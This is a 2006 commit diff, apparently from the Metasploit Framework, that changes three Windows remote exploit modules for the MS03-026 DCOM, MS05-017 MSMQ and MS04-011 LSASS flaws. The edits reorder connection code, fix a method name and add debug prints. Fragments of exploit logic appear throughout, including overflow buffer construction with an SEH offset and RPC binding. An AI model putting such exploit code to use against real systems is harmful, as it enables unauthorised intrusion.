Exploit order change to get correct default options

git-svn-id: file:///home/svn/incoming/trunk@3644 4d416f70-5f16-0410-b530-b9f4589650da
2006-05-30 15:44:33 +00:00 · 2006-05-30 15:44:33 +00:00 · dd20a7a633
parent 18bb4f9e6d
commit dd20a7a633
3 changed files with 15 additions and 9 deletions
--- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
+++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
@ -185,6 +185,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
 			NDR.long(1) +
 			NDR.long(rand(0xFFFFFFFF))
 	
+		p uncpath
 		
 		print_status('Sending exploit ...')
 		begin
--- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
+++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
@ -60,13 +60,6 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 	end

 	def exploit
-		connect
-		print_status("Trying target #{target.name}...")
-		
-		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
-		print_status("Binding to #{handle} ...")
-		dcerpc_bind(handle)
-		print_status("Bound to #{handle} ...")


 		# MSMQ supports three forms of queue names, the two we can use are
@ -81,7 +74,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 		queue_nlen = queue_name.length * 2
 		queue_path = unicode(queue_name + "\\PRIVATE\$\\")

-		buf   = Rex::Text.rand_text_englishtext(4000, payload_badchars)
+		buf   = Rex::Text.rand_text_english(4000, payload_badchars)

 		# Windows 2000 SEH offset goes first
 		buf[332 + queue_nlen + 0, 4] = [ target['Rets'][0] ].pack('V')
@ -97,6 +90,17 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 		# Get the unicode length of this string
 		queue_plen = queue_path.length / 2

+		p queue_path
+	
+		connect
+		print_status("Trying target #{target.name}...")
+		
+		handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+		print_status("Binding to #{handle} ...")
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+
+	
 		stubdata = 
 			NDR.long(1) +
 			NDR.long(1) +
--- a/modules/exploits/windows/smb/ms04_011_lsass.rb
+++ b/modules/exploits/windows/smb/ms04_011_lsass.rb
@ -8,8 +8,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 	# This module exploits a vulnerability in the LSASS service
 	#
 	
-	include Exploit::Remote::SMB
 	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+	
 	
 	def initialize(info = {})
 		super(update_info(info,